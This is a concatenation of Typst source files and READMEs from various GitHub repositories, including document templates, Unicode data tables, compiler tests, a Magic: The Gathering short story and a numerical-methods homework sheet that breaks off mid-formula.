```typst
#definition(name: "Some definition")[
Some definition...
]
#deduction( name: "Some equation" )[
Some equation...
]
#theorem( name: "theorem" )[
some theorem...
]
#proof()[
Some proof...
]
```
You can also create your own environments by adding code like this in temp.typ
```typst
#let somefunc = base_env.with(
type: "Something",
fg: Somecolor,
bg: Somecolor,
)
```
To use it, add `#import "temp.typ": somefunc` to your document
https://github.com/detypstify/detypstify | https://raw.githubusercontent.com/detypstify/detypstify/main/paper/README.md | markdown | # Neural Information Processing Systems (NeurIPS)
## Usage
You can use this template in the Typst web app by clicking _Start from
template_ on the dashboard and searching for `bloated-neurips`.
Alternatively, you can use the CLI to kick this project off using the command
```shell
typst init @preview/bloated-neurips
```
Typst will create a new directory with all the files needed to get you started.
## Configuration
This template exports the `neurips2023` function with the following named
arguments.
- `title`: The paper's title as content.
- `authors`: An array of author dictionaries. Each of the author dictionaries
must have a name key and can have the keys department, organization,
location, and email.
- `abstract`: The content of a brief summary of the paper or none. Appears at
the top under the title.
- `bibliography`: The result of a call to the bibliography function or none.
The function also accepts a single, positional argument for the body of the
paper.
- `accepted`: If this is set to `false`, an anonymized document ready for
  submission is produced; `accepted: true` produces the camera-ready version.
  If the argument is set to `none`, a preprint version is produced (which can
  be uploaded to arXiv).
The template will initialize your package with a sample call to the `neurips2023`
function in a show rule. If you want to change an existing project to use this
template, you can add a show rule at the top of your file.
## Issues
This template is developed at [daskol/typst-templates][1] repo. Please report
all issues there.
- The biggest and most important issue is related to the line ruler. We are
  not aware of a universal method for numbering lines in the main body of a
  paper.
- There is an issue in Typst with spacing between subsequent figures and
  between figures with floating placement: there is no way to specify the gap
  between them. In order to get behaviour similar to the original LaTeX
  template, one should consider a direct spacing adjustment with `v(-1em)`
  as follows.
```typst
#figure(
rect(width: 4.25cm, height: 4.25cm, stroke: 0.4pt),
caption: [Sample figure caption.#v(-1em)],
placement: top,
)
#figure(
rect(width: 4.25cm, height: 4.25cm, stroke: 0.4pt),
caption: [Sample figure caption.],
placement: top,
)
```
- Another issue is related to Typst's inability to produce colored
  annotations. In order to mitigate the issue, we add a script which modifies
  annotations and makes them colored.
```shell
../colorize-annotations.py \
example-paper.typst.pdf example-paper-colored.typst.pdf
```
    See [README.md][3] for details.
- NeurIPS 2023 instructions discuss bibliography in vague terms. Namely, there
is not specific requirements. Thus we stick to `ieee` bibliography style
since we found it in several accepted papers and it is similar to that in the
example paper.
- It is unclear how to render notice in the bottom of the title page in case of
final (`accepted: true`) or preprint (`accepted: none`) submission.
[1]: https://github.com/daskol/typst-templates
[3]: ../#colored-annotations
|
|
https://github.com/pank-su/typst-gost | https://raw.githubusercontent.com/pank-su/typst-gost/main/main.typ | typst | #import "templates/index.typ": *
#import "templates/utils.typ": *
// Тут указываем только авторов [authors] и название работы [title]
#show: index.with(authors: ("<NAME>", ), )
#ch("Introduction")
#lorem(60)
= In this paper
#lorem(20)
=== Contributions
#lorem(40)
= Related Work
#lorem(500)
|
|
https://github.com/veilkev/jvvslead | https://raw.githubusercontent.com/veilkev/jvvslead/Typst/files/count.typ | typst | #import "../sys/packages.typ": *
#import "../sys/sys.typ": *
#import "../sys/header.typ": *
#import "@preview/bob-draw:0.1.0": *
// Space between header
#v(150pt)
// Shows heading
#text(size: 12pt
)[= Counting In/Out]
#note("Description")
Bank 99 \
#sym.arrow.r Bank Till (_for general store use_)\
#sym.arrow.r New Till (_Business Center: \$285_)\
#sym.arrow.r Bank Coin (_Rolls of Coins_)\
#sym.arrow.r Safe Coin (_Boxes of Coins_)\
#sym.arrow.r Bank Safe (_Bundles of Bills_)\ |
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/unichar/0.1.0/ucd/block-10D40.typ | typst | Apache License 2.0 | #let data = (
("GARAY DIGIT ZERO", "Nd", 0),
("GARAY DIGIT ONE", "Nd", 0),
("GARAY DIGIT TWO", "Nd", 0),
("GARAY DIGIT THREE", "Nd", 0),
("GARAY DIGIT FOUR", "Nd", 0),
("GARAY DIGIT FIVE", "Nd", 0),
("GARAY DIGIT SIX", "Nd", 0),
("GARAY DIGIT SEVEN", "Nd", 0),
("GARAY DIGIT EIGHT", "Nd", 0),
("GARAY DIGIT NINE", "Nd", 0),
("GARAY VOWEL SIGN A", "Lo", 0),
("GARAY VOWEL SIGN I", "Lo", 0),
("GARAY VOWEL SIGN O", "Lo", 0),
("GARAY VOWEL SIGN EE", "Lo", 0),
("GARAY VOWEL LENGTH MARK", "Lm", 0),
("GARAY SUKUN", "Lo", 0),
("GARAY CAPITAL LETTER A", "Lu", 0),
("GARAY CAPITAL LETTER CA", "Lu", 0),
("GARAY CAPITAL LETTER MA", "Lu", 0),
("GARAY CAPITAL LETTER KA", "Lu", 0),
("GARAY CAPITAL LETTER BA", "Lu", 0),
("GARAY CAPITAL LETTER JA", "Lu", 0),
("GARAY CAPITAL LETTER SA", "Lu", 0),
("GARAY CAPITAL LETTER WA", "Lu", 0),
("GARAY CAPITAL LETTER LA", "Lu", 0),
("GARAY CAPITAL LETTER GA", "Lu", 0),
("GARAY CAPITAL LETTER DA", "Lu", 0),
("GARAY CAPITAL LETTER XA", "Lu", 0),
("GARAY CAPITAL LETTER YA", "Lu", 0),
("GARAY CAPITAL LETTER TA", "Lu", 0),
("GARAY CAPITAL LETTER RA", "Lu", 0),
("GARAY CAPITAL LETTER NYA", "Lu", 0),
("GARAY CAPITAL LETTER FA", "Lu", 0),
("GARAY CAPITAL LETTER NA", "Lu", 0),
("GARAY CAPITAL LETTER PA", "Lu", 0),
("GARAY CAPITAL LETTER HA", "Lu", 0),
("GARAY CAPITAL LETTER OLD KA", "Lu", 0),
("GARAY CAPITAL LETTER OLD NA", "Lu", 0),
(),
(),
(),
("GARAY VOWEL SIGN E", "Mn", 230),
("GARAY CONSONANT GEMINATION MARK", "Mn", 230),
("GARAY COMBINING DOT ABOVE", "Mn", 230),
("GARAY COMBINING DOUBLE DOT ABOVE", "Mn", 230),
("GARAY CONSONANT NASALIZATION MARK", "Mn", 230),
("GARAY HYPHEN", "Pd", 0),
("GARAY REDUPLICATION MARK", "Lm", 0),
("GARAY SMALL LETTER A", "Ll", 0),
("GARAY SMALL LETTER CA", "Ll", 0),
("GARAY SMALL LETTER MA", "Ll", 0),
("GARAY SMALL LETTER KA", "Ll", 0),
("GARAY SMALL LETTER BA", "Ll", 0),
("GARAY SMALL LETTER JA", "Ll", 0),
("GARAY SMALL LETTER SA", "Ll", 0),
("GARAY SMALL LETTER WA", "Ll", 0),
("GARAY SMALL LETTER LA", "Ll", 0),
("GARAY SMALL LETTER GA", "Ll", 0),
("GARAY SMALL LETTER DA", "Ll", 0),
("GARAY SMALL LETTER XA", "Ll", 0),
("GARAY SMALL LETTER YA", "Ll", 0),
("GARAY SMALL LETTER TA", "Ll", 0),
("GARAY SMALL LETTER RA", "Ll", 0),
("GARAY SMALL LETTER NYA", "Ll", 0),
("GARAY SMALL LETTER FA", "Ll", 0),
("GARAY SMALL LETTER NA", "Ll", 0),
("GARAY SMALL LETTER PA", "Ll", 0),
("GARAY SMALL LETTER HA", "Ll", 0),
("GARAY SMALL LETTER OLD KA", "Ll", 0),
("GARAY SMALL LETTER OLD NA", "Ll", 0),
(),
(),
(),
(),
(),
(),
(),
(),
("GARAY PLUS SIGN", "Sm", 0),
("GARAY MINUS SIGN", "Sm", 0),
)
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/cli/README.md | markdown | Apache License 2.0 | # typst-ts-cli
See [Typst.ts](https://github.com/Myriad-Dreamin/typst.ts)
|
https://github.com/HPDell/typst-starter-journal-article | https://raw.githubusercontent.com/HPDell/typst-starter-journal-article/main/template/main.typ | typst | MIT License | #import "@preview/starter-journal-article:0.3.1": article, author-meta
#show: article.with(
title: "Article Title",
authors: (
"Author One": author-meta(
"UCL", "TSU",
email: "<EMAIL>",
),
"Author Two": author-meta(
"TSU",
cofirst: true
),
"Author Three": author-meta(
"TSU"
)
),
affiliations: (
"UCL": "UCL Centre for Advanced Spatial Analysis, First Floor, 90 Tottenham Court Road, London W1T 4TJ, United Kingdom",
"TSU": "Haidian District, Beijing, 100084, P. R. China"
),
abstract: [#lorem(100)],
keywords: ("Typst", "Template", "Journal Article"),
bib: bibliography("./ref.bib")
)
= Section
#lorem(20) @netwok2020
== Subsection
#lorem(50)
=== Subsubsection
#lorem(80)
|
https://github.com/donabe8898/typst-thesis-template | https://raw.githubusercontent.com/donabe8898/typst-thesis-template/main/template/main.typ | typst | Apache License 2.0 | #import "../resume/titlepage.typ": *
// ページ設定
#set par(leading: 1em)
#set enum(indent: 1em)
#set table(inset: 8pt)
#set heading(numbering: "1.1.")
#set ref(supplement: "式")
// 表紙
#show: titlepage.with(
title: "ハンバーガー4個分指数に関する研究",
author: "XDG1991L 小倉=ノルト=オグラノ",
date: "2023 年 12 月 hoge 日",
year:"2023 年度",
teacher: "指導教員 菜似四天 阿呆駄羅 教授",
univ_name: "フォーエバー大学 経済学部"
)
// ページ設定
#set math.equation(numbering: (sym.dots.h.c + " (1)"))
#set page(
numbering: "1",
)
#set figure(
numbering: "1",
)
#set align(left)
// NOTE: コードブロックの背景など
#show raw.where(block: false): box.with(
fill: luma(240),
inset: (x: 3pt, y: 0pt),
outset: (y: 3pt),
radius: 2pt,
)
#show raw.where(block: true): block.with(
fill: luma(240),
inset: 10pt,
radius: 4pt,
)
// 目次設定
#counter(page).update(1)
#outline(title: [目次])
// 改ページ
#pagebreak()
= これでいいのだ
#v(1em)
```textile
コードも楽々打てる。
> 楽にコードが書けるわけではないが?
```
```rs
fn main(){
println!("Hello World");
}
``` |
https://github.com/Wallbreaker5th/fuzzy-cnoi-statement | https://raw.githubusercontent.com/Wallbreaker5th/fuzzy-cnoi-statement/main/fuzzy-cnoi-statement.typ | typst | MIT No Attribution | // Typst template for making NOI-like problems
// Author: Wallbreaker5th
// MIT-0 License
#import "@preview/codelst:2.0.0": sourcecode
#let 字号 = (
初号: 42pt,
小初: 36pt,
一号: 26pt,
小一: 24pt,
二号: 22pt,
小二: 18pt,
三号: 16pt,
小三: 15pt,
四号: 14pt,
中四: 13pt,
小四: 12pt,
五号: 10.5pt,
小五: 9pt,
六号: 7.5pt,
小六: 6.5pt,
七号: 5.5pt,
小七: 5pt,
)
#let default-fonts = (
mono: "Consolas",
serif: "New Computer Modern",
cjk-serif: "FZShuSong-Z01S",
cjk-sans: "FZHei-B01S",
cjk-mono: "FZFangSong-Z02S",
cjk-italic: "FZKai-Z03S",
)
#let empty-par = {
par()[
#v(0em, weak: true)
#h(0em)
]
}
#let add-empty-par(it) = {
it
empty-par
}
#let default-problem-fullname(problem) = {
if (problem.at("name", default: none) != none) {
problem.name
if (problem.at("name-en", default: none) != none) {
"(" + problem.name-en + ")"
}
} else {
problem.at("name-en", default: "")
}
}
#let default-header(contest-info, current-problem) = {
if (current-problem == none) {
return
}
set text(size: 字号.五号)
contest-info.name
h(1fr)
let round = contest-info.at("round", default: none)
if (round != none) {
round + " "
}
default-problem-fullname(current-problem)
v(-2pt)
line(length: 100%, stroke: 0.3pt)
}
#let default-footer(contest-info, current-problem) = {
if (current-problem == none) {
return
}
set text(size: 字号.五号)
align(center,{
[第]
counter(page).display()
[页]
h(2em)
[共]
context{
let cnt = counter(page).final().at(0)
link((page:cnt, x:0pt, y:0pt), text(fill: rgb("#00f"), [#cnt]))
}
[页]
})
}
#let make-formula(s) = {
let numbers = s.matches(regex("[\d.]+"))
let last-end = 0
for n in numbers {
let start = n.start
let end = n.end
let number = n.text
s.slice(last-end, start)
math.equation(number)
last-end = end
}
s.slice(last-end, s.len())
}
#let current-problem-idx = counter("current-problem-idx")
#let statement-page-begin = state("statement-page-begin", false)
#let document-class(
contest-info,
problem-list,
custom-fonts: (:),
header: default-header,
footer: default-footer,
) = {
let fonts = default-fonts + custom-fonts
let get-current-problem(here) = {
let idx = current-problem-idx.at(here).at(0) - 1
if (idx >= 0) { problem-list.at(idx) }
}
let init(it) = {
set text(font: (fonts.serif, fonts.cjk-serif), size: 字号.小四, lang: "zh", region: "CN")
show emph: set text(font: (fonts.serif, fonts.cjk-italic))
show strong: st => { // Dotted strong text
set text(font: (fonts.serif, fonts.cjk-sans))
show regex("\p{sc=Hani}+"): s => {
underline(s, offset: 3pt, stroke: (
cap: "round",
thickness: 0.1em,
dash: (array: (0em, 1em), phase: 0.5em)
))
}
st
}
show raw: set text(font: (fonts.mono, fonts.cjk-mono), size: 字号.小四)
set list(indent: 1.75em, marker: ([•], [#h(-1em)•]))
set enum(
indent: 1.75em,
numbering: x => {
grid(
columns: (0em, auto),
align: bottom,
hide[悲], numbering("1.", x)
) // As a workaround
}
)
show heading: set text(font: (fonts.serif, fonts.cjk-sans), weight: 500)
show heading.where(level: 1): it => {
set text(size: 字号.小二)
set heading(bookmarked: true)
pad(top: 8pt, align(center, it))
}
show heading.where(level: 2): it => {
set text(size: 字号.小四)
set heading(bookmarked: true)
pad(left: 1.5em, top: 1em, bottom: .5em, [【]+box(it)+[】])
}
show raw.where(block: true): it => {
show raw.line: it => {
if (it.text == "" and it.number == it.count) {
return
}
box(
grid(
columns: (0em, 1fr),
align: (right, left),
move(
text(str(it.number), fill: gray, size: 0.8em),
dx: -1em,
dy: 0.1em,
),
it.body
)
)
}
pad(
rect(it, stroke: 0.5pt + rgb("#00f"), width: 100%, inset: (y: 0.7em)),
left: 0.5em
)
}
// Page Layout
set page(
margin: 2.4cm,
header: context header(contest-info, get-current-problem(here())),
footer: context if(statement-page-begin.at(here())) {
footer(contest-info, get-current-problem(here()))
},
)
show figure: add-empty-par
show table: pad.with(y: .5em)
show table: add-empty-par
show heading: add-empty-par
show list: add-empty-par
show enum: add-empty-par
show raw.where(block: true): add-empty-par
show rect: add-empty-par
show block: add-empty-par
set par(first-line-indent: 2em, leading: 0.7em)
// Looks right but I'm not sure about the exact value
show par: set block(below: 0.6em)
it
}
let title() = {
align(center, {
text(contest-info.name, size: 字号.二号, font: (fonts.serif, fonts.cjk-sans))
parbreak()
v(10pt)
let name-en = contest-info.at("name-en", default: none)
if (name-en != none) {
text(name-en, size: 字号.小一)
parbreak()
v(10pt)
}
let round = contest-info.at("round", default: none)
if (round != none) {
emph(text(round, size: 字号.二号))
parbreak()
}
let author = contest-info.at("author", default: none)
if (author != none) {
text(author, size: 字号.小三, font: (fonts.serif, fonts.cjk-sans))
parbreak()
v(5pt)
}
let time = contest-info.at("time", default: none)
if (time != none) {
text(time, size: 字号.小三, font: (fonts.serif, fonts.cjk-sans))
}
})
}
let problem-table(
extra-rows: (:),
languages: (("C++", "cpp"),),
compile-options: (("C++", "-O2 -std=c++14 -static"),),
) = {
let default-row = (
wrap: text,
always-display: false,
default: "无",
)
let rows = (
name: (
name: "题目名称",
always-display: true,
),
type: (
name: "题目类型",
always-display: true,
default: "传统型",
),
name-en: (
name: "目录",
wrap: raw,
always-display: true,
),
executable: (
name: "可执行文件名",
wrap: raw,
always-display: true,
default: x => x.name-en,
),
input: (
name: "输入文件名",
wrap: raw,
always-display: true,
default: x => x.name-en + ".in",
),
output: (
name: "输出文件名",
wrap: raw,
always-display: true,
default: x => x.name-en + ".out",
),
time-limit: (
name: "每个测试点时限",
wrap: make-formula,
),
memory-limit: (
name: "内存限制",
wrap: make-formula,
),
test-case-count: (
name: "测试点数目",
default: "10",
wrap: make-formula,
),
subtask-count: (
name: "子任务数目",
default: "1",
),
test-case-equal: (
name: "测试点是否等分",
default: "是",
),
) + extra-rows
rows = rows.pairs().map(
row => (row.at(0), default-row + row.at(1))
)
set table(align: bottom)
let first-column-width = if (problem-list.len() <= 3) { 22% } else { 1fr }
let columns = (first-column-width, ) + (1fr, ) * problem-list.len()
table(
columns: columns,
stroke: 0.4pt,
..{
rows.filter(row => {
let (field, r) = row
if (r.always-display) {
true
} else {
problem-list.any(p => p.at(field, default: none) != none)
}
}).map(row => {
let (field, r) = row
(text(r.name), )
problem-list.map(p => {
let v = p.at(field, default: none)
let w = if (v == none) {
if (type(r.default) == str) {
(r.wrap)(r.default)
} else if (type(r.default) == function) {
(r.wrap)((r.default)(p))
} else if (type(r.default) == content) {
(r.wrap)(r.default)
}
} else {
v
}
if (type(w) == str) {
(r.wrap)(w)
} else {
w
}
})
}).flatten()
}
)
[提交源程序文件名]
table(
columns: columns,
stroke: 0.4pt,
align: horizon,
..{
languages.map(l => {
if (l.len() == 2) {
l += (1em, )
}
(text(size: l.at(2))[对于 #l.at(0) #h(1fr) 语言], )
problem-list.map(p => {
let v = p.at("submit-file-name", default: p.name-en + "." + l.at(1))
if (type(v) == str) {
raw(v)
} else if (type(v) == function){
v(l.at(1))
} else {
v
}
})
}).flatten()
}
)
[编译选项]
table(
columns: columns,
align: (left+bottom, center+bottom),
stroke: 0.4pt,
..{
compile-options.map(l => {
if (l.len() == 2) {
l += (1em, )
}
(
text(size: l.at(2))[对于 #l.at(0) #h(1fr) 语言],
table.cell(
colspan: problem-list.len(),
raw(l.at(1))
)
)
}).flatten()
}
)
}
let next-problem() = {
current-problem-idx.step()
pagebreak()
statement-page-begin.update(it => true)
context {
let problem = get-current-problem(here())
heading(level: 1, default-problem-fullname(problem))
}
}
let filename(it) = {
set text(style: "italic", weight: "bold")
it
}
let current-filename(ext) = context {
let problem = get-current-problem(here())
filename(problem.at("name-en") + "." + ext)
}
let current-sample-filename(idx, ext) = context {
let problem = get-current-problem(here())
filename(problem.at("name-en") + "/" + problem.at("name-en") + str(idx) + "." + ext)
}
let data-constraints-table-args = {
(
stroke: (x, y) => (
left: if (x > 0) { .4pt },
bottom: 2pt,
top: if(y == 0) { 2pt } else if (y == 1) { 1.2pt } else { .4pt }
),
align: center+horizon,
)
}
(
init: init,
title: title,
problem-table: problem-table,
next-problem: next-problem,
filename: filename,
current-filename: current-filename,
current-sample-filename: current-sample-filename,
data-constraints-table-args: data-constraints-table-args
)
}
|
https://github.com/jgm/typst-hs | https://raw.githubusercontent.com/jgm/typst-hs/main/test/typ/compiler/array-06.typ | typst | Other | // Test default value.
#test((1, 2, 3).at(2, default: 5), 3)
#test((1, 2, 3).at(3, default: 5), 5)
|
https://github.com/zurgl/typst-resume | https://raw.githubusercontent.com/zurgl/typst-resume/main/templates/letter/main.typ | typst | #import "../../metadata.typ": *
#import "../commun.typ": *
#import "@preview/fontawesome:0.1.0": *
#let letterHeaderNameStyle(str) = { text(fill: accentColor, weight: "bold", str) }
#let letterHeaderAddressStyle(str) = { text(fill: gray, size: 0.9em, smallcaps(str)) }
#let letterDateStyle(str) = { text(size: 0.9em, style: "italic", str) }
#let letterSubjectStyle(str) = { text(fill: accentColor, weight: "bold", underline(str)) }
#let letterHeader(
myAddress: "Your Address Here",
recipientName: "<NAME>",
recipientAddress: "Company Address Here",
date: "Today's Date",
subject: "Subject: Hey!",
) = {
letterHeaderNameStyle(firstName + " " + lastName)
v(1pt)
letterHeaderAddressStyle(myAddress)
v(1pt)
align(right, letterHeaderNameStyle(recipientName))
v(1pt)
align(right, letterHeaderAddressStyle(recipientAddress))
v(1pt)
letterDateStyle(date)
v(1pt)
letterSubjectStyle(subject)
linebreak(); linebreak()
}
#let letterSignature(path) = {
linebreak()
place(right, dx: -5%, dy: 0%, image(path, width: 35%))
}
#let letterFooter() = {
place(bottom, table(
columns: (1fr, auto),
inset: 0pt,
stroke: none,
footerStyle([#firstName #lastName]),
footerStyle(languageSwitch(letterFooterInternational)),
))
}
|
|
https://github.com/TypstApp-team/typst | https://raw.githubusercontent.com/TypstApp-team/typst/master/tests/typ/meta/bibliography.typ | typst | Apache License 2.0 | // Test citations and bibliographies.
---
#set page(width: 200pt)
= Details
See also @arrgh #cite(<distress>, supplement: [p.~22]), @arrgh[p.~4], and @distress[p.~5].
#bibliography("/files/works.bib")
---
// Test unconventional order.
#set page(width: 200pt)
#bibliography(
"/files/works.bib",
title: [Works to be cited],
style: "chicago-author-date",
)
#line(length: 100%)
As described by #cite(<netwok>, form: "prose"),
the net-work is a creature of its own.
This is close to piratery! @arrgh
And quark! @quark
---
#set page(width: 200pt)
#set heading(numbering: "1.")
#show bibliography: set heading(numbering: "1.")
= Multiple Bibs
Now we have multiple bibliographies containing @glacier-melt @keshav2007read
#bibliography(("/files/works.bib", "/files/works_too.bib"))
---
// Test ambiguous reference.
= Introduction <arrgh>
// Error: 1-7 label occurs in the document and its bibliography
@arrgh
#bibliography("/files/works.bib")
---
// Error: 15-55 duplicate bibliography keys: netwok, issue201, arrgh, quark, distress, glacier-melt, tolkien54, sharing, restful, mcintosh_anxiety, psychology25
#bibliography(("/files/works.bib", "/files/works.bib"))
|
https://github.com/polarkac/MTG-Stories | https://raw.githubusercontent.com/polarkac/MTG-Stories/master/stories/003%20-%20Gatecrash/013_Behind%20the%20Black%20Sun.typ | typst | #import "@local/mtgstory:0.2.0": conf
#show: doc => conf(
"Behind the Black Sun",
set_name: "Gatecrash",
story_date: datetime(day: 27, month: 03, year: 2013),
author: "<NAME>",
doc
)
The candle flickered.
"I am a gateway for life," the cleric said.The dancing light added some numinous gravity to the statement.
The cleric smiled at the unconscious reaction that must have flickered across my face.
"Most give me a strange look when I tell them that. Perhaps it is because I wear the garb of an Orzhov and they believe in the grotesque slander perpetuated about our guild. We are not all selfish and greedy." The cleric sighed. "The ignorant always assume the worst, I suppose. People are easily swayed by mindless passion and intentioned guile, wouldn't you agree?"
"I suppose so," I said. "But you have to admit, the Orzhov are not known for playing fair."
The cleric leaned back in his chair, turned his palms up and shrugged. "We put everything in writing. It is all there to see. People just don't read the fine print before they sign."
I could feel the cleric's defensiveness and kicked myself for letting my own personal bias slip out. It was hard enough to find evidence of this order, let alone to actually be granted an audience with one of its members. I could feel years of work beginning to crumble in my hands. I'd have to swallow my opinions and pride if I was going to get anywhere with this unprecedented access.
"Very true. People are focused on what they want and rarely have the patience to wait and evaluate before acting on their desires."
That seemed to bring the cleric back again.
"Few can see the truth in that and I'm glad you do. My choice about revealing our order depends on your seeing with an open mind." He poured wine into a golden goblet and offered me some, but I politely declined. "The Orzhov value patience greatly. Its virtues are taught to us as soon as we begin our service to the guild; the task for which we have been chosen requires not only patience, but dedication, trust, and selflessness as well. Our task, our calling, is to lay down our lives for the Syndicate. We hold something beyond mere monetary value to the guild. We are a gateway through which something greater than ourselves can emerge."
Now we were getting to it. I was always fascinated by how devout belief could supersede the inherent desire to preserve life—our instinctual selfishness. The Boros wojek who sacrifices himself so innocents may live always held a mystery to me, a glimpse into another set of standards that runs deep within, operating below our critical, self-absorbed minds. It felt appropriate for Boros and Selesnya to exhibit such behavior, but the Orzhov? The rumors struck me as odd for the guild of deals.
Now, I would find out about this mystery cult within the walls of the Syndicate and document a critical moment of time in this cloistered world shrouded in myth and speculation.
The cleric set down his goblet and stood up.
"Walk with me to the sanctum."
#v(0.35em)
#line(length: 100%, stroke: rgb(90%, 90%, 90%))
#v(0.35em)
We walked into a high-ceilinged chamber that smelled of woody incense and torchwood. The cleric's robe flowed about him and the heavy gold disks that hung from his collar like thick smoke.
In the flickering torchlight, I could make out a large Orzhov symbol on the floor done with large, stone tiles. The cleric kneeled in the circle and motioned for me to sit on a small, armless chair some distance from him. As soon as I had pulled out my quill and paper, he began, his voice echoing off into the darkness.
"Our order represents the purest ideals of the Orzhov, which is why so few of us are chosen. It is too heavy a mantle for most, but I found that after being chosen my life was suffused with a great sense of purpose. To this day, fulfilling that purpose has been my highest ambition."
At that moment, two robed priests walked into the torchlight like silent phantoms. One set candles before the cleric and lit them with long matchsticks. The other priest set several bowls before the cleric that contained something heavy. I could tell because of the dull thud it made on the stone tiles. Then the priests left as silently as they came.
#figure(image("013_Behind the Black Sun/01.jpg", width: 100%), caption: [], supplement: none, numbering: none)
From the folds of his robe, the cleric produced a glass tube capped at either end that hung on a gold chain. Within the tube swirled a turbulent, white smoke that seemed somehow alive.
"This is the Deathpact," he said, as he gazed into the tube, its faint light playing across his features like sunlight through water. The cleric gazed into its depths, mesmerized. Its eerie luminescence made his already pale face impossibly paler, which served to exaggerate the blackness of his obsidian eyes; he looked like some ivory specter as he pondered its swirling depths. "It is the namesake of our sacred order. Hard to imagine that within this small cylinder lies such magnificent power."
The cleric unhooked the slender cylinder from its chain and reverently laid the tube before him. He then removed the lids from the golden bowls and reached in to scatter handfuls of coins around him on the floor. The sound of the coins as they echoed throughout the giant hall made me feel as if I was in some strange, enormous wind-chime. I felt a bolt of primal apprehension shoot through me and flood my limbs.
#emph[What kind of power was he talking about? Was I in danger?]
I instinctively moved back from the cleric and resisted the urge to flee from the room. I took a deep breath as he continued, recording everything with my quill pen in spite of my fear. The instincts of being a scribe are hard to quell: knowledge at any price.
I wondered what meaning, if any, the coins had, but I dared not break the ritual with a question. It felt rude. Sacrilegious. I scribbled down every detail I could as the cleric made more gestures and utterances. His trance slowly deepened; the scratching sound of my quill on parchment felt like an intrusion, but I was more afraid to leave out any detail.
Then he became still.
After a long moment with only the sounds of the torches burning, the cleric whispered.
"I am ready."
Then he unscrewed the cap of the glass cylinder.
My mind raced with anticipation. #emph[Ready for what? What was going to happen? What secrets was I about to witness?]
It seemed a trick of the mind at first, but then...
The turbulent smoke within the glass cylinder tentatively snaked out like a sentient thing. The cleric took in long deep breaths as the white smoke quested toward his face. It bumped into the cleric's chest; he reflexively jerked but held his eyes shut as it encircled his neck. As the smoke drew closer to his face, sliding upward toward the cleric's nose, I could make out a jet-black strand within it that looked like a slick piece of rubber glistening in the torchlight. The cleric's mumbled prayer ceased as he took one deep breath through his nose. As if it heard the inhalation, the smoke lunged into the cleric's nostrils and vanished. The cleric made a gagging sound as he crumpled forward.
I jumped up, but as I did my sleeve caught my ink-pot and sent it clattering across the stone floor. Black ink sprayed about like dark blood in the torchlight. I rushed to the cleric's side as he writhed on the floor and rolled him over. He clawed at his golden collar. His face had turned to a mottled patchwork of purplish veins and bruised flesh. I called for help. All I heard was the reverberations through the great hall.
Then black smoke began to billow out of the cleric's mouth. It reminded me instantly of an Izzet chemical fire I had witnessed a few years back.
The cleric's head and neck arched back as he went instantly stiff. The black smoke poured from his nose and ears as well and began to form before me as I recoiled and brought my sleeve to my face.
The cleric's body shriveled and desiccated before my eyes as a thick white vapor fumed out of it and coalesced into a humanoid shape. Arms, legs, head, and torso gathered before me into a solid form of a regal woman with skin like alabaster. The black smoke formed into two great wings behind her and billowing smoke wrapped around her like living cloth. Gold coins and their golden containers became puddles of liquid metal that formed into shimmering armor and the massive arc of a scythe. All this moved before my unbelieving eyes in an arcane act of creation, but all I could do was gaze on the face of this unearthly creature who regarded me with an impassive but intensely curious gaze.
She held out her hand, her pale fingers closing around the ebony haft of the great scythe precisely as the last wisps of black smoke formed the handle.
#figure(image("013_Behind the Black Sun/02.jpg", width: 100%), caption: [], supplement: none, numbering: none)
The angel flexed the fingers of her free hand as if to test their efficacy, then looked at her shining armor and surroundings. I was frozen. I didn't want to move, lest I incurred her wrath, but neither did I want to stay.
She flexed her raven-feathered wings then turned about to face me.
"You. Orzhov scribe. Write this." Even though it was just above a whisper, her voice sliced through the air like a razorblade. After a moment of hesitation, I scrambled for my parchment, quill, and toppled ink-pot. Thankfully, a few drops remained in the well.
"I have come from the ghost halls of the Obzedat with a message for <NAME>. There is more to the maze than we knew. T<NAME> must find the correct route and complete the maze at all costs."
|
|
https://github.com/LucaCiucci/bob-typ | https://raw.githubusercontent.com/LucaCiucci/bob-typ/main/README.md | markdown | MIT License | # bob-draw-typ
svgbob for typst, powered by wasm
See [`typst-package/README.md`](typst-package/README.md) for more information.
## Build
```sh
cargo build --release --target wasm32-unknown-unknown; cp ./target/wasm32-unknown-unknown/release/bob_typ.wasm ./typst-package
``` |
https://github.com/Thumuss/truthfy | https://raw.githubusercontent.com/Thumuss/truthfy/main/example.typ | typst | MIT License | #import "main.typ": *
#set page(width: auto, height: 500pt)
#truth-table($u_7 => u_(22) => u$, $u_7 ? u_22 : u$)
#truth-table($A xor B$, $A and B$)
#truth-table($A and B$, $B or A$, $A => B$)
#truth-table($p => q$, $not p => (q <=> p)$, $p or q$, $not p xor q$)
#truth-table(sc: (a) => {if (a) {"a"} else {"b"}}, $a and b$)
#truth-table-empty(sc: (a) => {if (a) {"x"} else {"$"}}, ($a and b$,), (false, [], true))
|
https://github.com/7sDream/fonts-and-layout-zhCN | https://raw.githubusercontent.com/7sDream/fonts-and-layout-zhCN/master/chapters/06-features-2/anchor/anchor.typ | typst | Other | #import "/template/template.typ": web-page-template
#import "/template/components.typ": note
#import "/lib/glossary.typ": tr
#show: web-page-template
// ## Anchor attachment
== #tr[anchor attachment]
// XXX
// 原文少一段介绍待补
|
https://github.com/EunTilofy/NumComputationalMethods | https://raw.githubusercontent.com/EunTilofy/NumComputationalMethods/main/Chapter10/Chapter10-1.typ | typst | #import "../template.typ": *
#show: project.with(
course: "Computing Method",
title: "Computing Method - Chapter10-1",
date: "2024.5.21",
authors: "<NAME>, 3210106357",
has_cover: false
)
*Problems:Chapter9-3,Chapter10-3*
#HWProb(name: "9-3")[
Show that the computational formulas (9.33) of the Jacobi method can be written as
$
&d = cot 2 phi, t = -d + text("sign")(d) sqrt(1 + d^2) \
&c = 1 \/ sqrt(1 + t^2), s = c t,\
&a_(i i)^((1)) = a_(i i) + t a_(i j), a_(j j)^((1)) = a_(j j) - t a_(i j),\
&a_(i j)^((1)) = a_(j i)^((1)) = 0, \
&a_(i l)^((1)) = a_(l i)^((1)) = c a_(i l) + s a_(j l), \
&a_(j l)^((1)) = a_(l j)^((1)) = -s a_(i l) + c a_(j l), l eq.not i, j\
&a_(m l)^((1)) = a_(l m)^((1)) = a_(m l), m,l eq.not i, j
$
]
#Proof[
For (9.33), if we take $
